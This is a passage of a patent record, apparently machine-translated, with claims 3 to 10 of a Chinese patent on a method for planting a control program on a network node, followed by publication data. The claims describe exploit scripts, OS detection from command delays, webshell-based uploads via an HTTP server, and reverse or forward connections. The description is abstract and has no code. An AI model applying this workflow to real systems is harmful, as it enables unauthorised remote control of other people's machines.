3. The method according to claim 2, wherein determining the operating system, and uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system, comprises:
judging whether an operating system is given;
if the operating system is given, uploading a control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the operating system can be judged according to the time delay, judging the operating system by using the time delay of the execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the operating system cannot be judged according to the time delay, executing a reverse-connection guess by using the execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
4. The method according to claim 2, wherein said establishing a connection with said target node to be controlled comprises:
listening on a service port of the test server, and, when the vulnerability exploitation script is used to execute a control program test command on the target node to be controlled so that the target node to be controlled connects to the service port of the test server, determining whether the target node to be controlled can be connected in a reverse connection mode; or,
when the vulnerability exploitation script is used to execute a control program test command on the target node to be controlled so that the target node to be controlled listens on a service port of its own, listening on the service port of the target node to be controlled, and determining whether the target node to be controlled can be connected in a forward connection mode.
5. The method according to claim 2, wherein the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to an operating system so as to upload the control program to the target node to be controlled.
6. The method according to claim 5, wherein uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further comprises:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload a control program to the target node to be controlled.
7. The method of claim 6, wherein uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further comprises:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
8. A connection device for a control program, comprising:
the acquisition module is used for acquiring a target node to be controlled and a corresponding vulnerability exploitation script in the target network;
the reading module is used for reading the vulnerability exploiting script and obtaining executable actions corresponding to the vulnerability exploiting script;
the transmission module is used for uploading a control program to the target node to be controlled by using the webshell when the vulnerability exploitation script can be successfully injected into the webshell;
and the connection module is used for opening an access agent on the target node to be controlled by utilizing the webshell and establishing connection with the target node to be controlled by utilizing the access agent.
9. An electronic device, comprising:
at least one processor; and
a memory communicatively coupled to the at least one processor;
the memory stores instructions executable by the at least one processor to enable the at least one processor to perform the method of any one of claims 1-7.
10. A non-transitory computer readable storage medium storing computer instructions for causing the computer to perform the method of any one of claims 1-7.
Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311837033.7A CN117478721B (en) 2023-12-28 2023-12-28 Connection method, device, equipment and storage medium for control program
Publications (2)

Publication Number Publication Date
CN117478721A true CN117478721A (en) 2024-01-30
CN117478721B CN117478721B (en) 2024-04-12

Family

ID=89631616

Country Status (1)

Country Link
CN (1) CN117478721B (en)

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant